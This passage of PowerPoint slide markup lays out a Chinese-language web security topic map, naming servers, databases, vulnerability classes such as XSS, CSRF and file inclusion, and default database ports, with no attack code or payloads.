            <a:ext cx="5593352" cy="36580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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Apache Http Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Apache Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/IBM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Websphere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/WebLogic/Jetty/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Nginx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4692405" y="1862833"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>JQuery</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5340477" y="1862833"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>JOSN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="矩形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1830080" y="4512340"/>
            <a:ext cx="4139040" cy="26812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关系数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件存储</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="矩形 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1837904" y="3861048"/>
            <a:ext cx="4148786" cy="25603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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="600710">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>缓存数据库（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Key-value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="矩形 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1831682" y="4182731"/>
            <a:ext cx="624150" cy="24956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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Redis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="矩形 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2540712" y="4193497"/>
            <a:ext cx="993760" cy="23879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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Memcached</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3021817" y="1484790"/>
            <a:ext cx="4434552" cy="283367"/>
            <a:chOff x="2505089" y="890938"/>
            <a:chExt cx="5912736" cy="377822"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="矩形 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2505089" y="900953"/>
              <a:ext cx="1397553" cy="367807"/>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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>XSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>跨站攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="矩形 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3994436" y="906487"/>
              <a:ext cx="1397553"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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>跨站伪造</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="矩形 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7020272" y="890938"/>
              <a:ext cx="1397553"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浏览器安全</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="矩形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5511257" y="899475"/>
              <a:ext cx="1397553"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点击劫持</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="矩形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1837902" y="2148609"/>
            <a:ext cx="2290427" cy="23010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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CSP(Content Security Policy)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="矩形 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6223832" y="2589619"/>
            <a:ext cx="1300496" cy="26034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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Session/Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="矩形 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7614661" y="2609060"/>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zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>组件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="矩形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7614661" y="2969024"/>
            <a:ext cx="616744" cy="22145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zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>组件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="矩形 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3655710" y="4198055"/>
            <a:ext cx="993760" cy="23879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algn="ctr" defTabSz="600710">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MongoDB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2931510" y="2729842"/>
            <a:ext cx="5456886" cy="709373"/>
            <a:chOff x="2931510" y="2158341"/>
            <a:chExt cx="5456886" cy="709373"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2931510" y="2158341"/>
              <a:ext cx="4256477" cy="709373"/>
              <a:chOff x="2374486" y="2521458"/>
              <a:chExt cx="5675303" cy="945830"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="矩形 32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2396952" y="2521458"/>
                <a:ext cx="983842"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注入攻击</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="矩形 47"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3572237" y="2540494"/>
                <a:ext cx="1263489"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文件上传漏洞</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="矩形 48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4947821" y="2544190"/>
                <a:ext cx="1471130"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认证和会话管理</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="矩形 50"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2374486" y="3095991"/>
                <a:ext cx="1471130"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chemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>框架安全</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52" name="矩形 51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3994436" y="3106926"/>
                <a:ext cx="1912009"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err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>WebServer</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>配置安全</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="矩形 31"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6020899" y="3105674"/>
                <a:ext cx="1863470" cy="360363"/>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en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>WEB</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>应用源代码安全</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="矩形 49"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6578659" y="2551367"/>
                <a:ext cx="1471130" cy="36036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访问控制</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="矩形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7275141" y="2160809"/>
              <a:ext cx="1103347" cy="27027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目录遍历</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="矩形 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7285049" y="2549366"/>
              <a:ext cx="1103347" cy="270272"/>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文件包含</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2983114" y="3785315"/>
            <a:ext cx="5116584" cy="1650782"/>
            <a:chOff x="1835696" y="3933056"/>
            <a:chExt cx="6822113" cy="2201043"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6671928" y="3933057"/>
              <a:ext cx="1985881" cy="1240088"/>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数据库缺省端口号</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Oracle</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>1521</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>MSSQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>1433</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Mysql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>3306</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>PostgreSQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
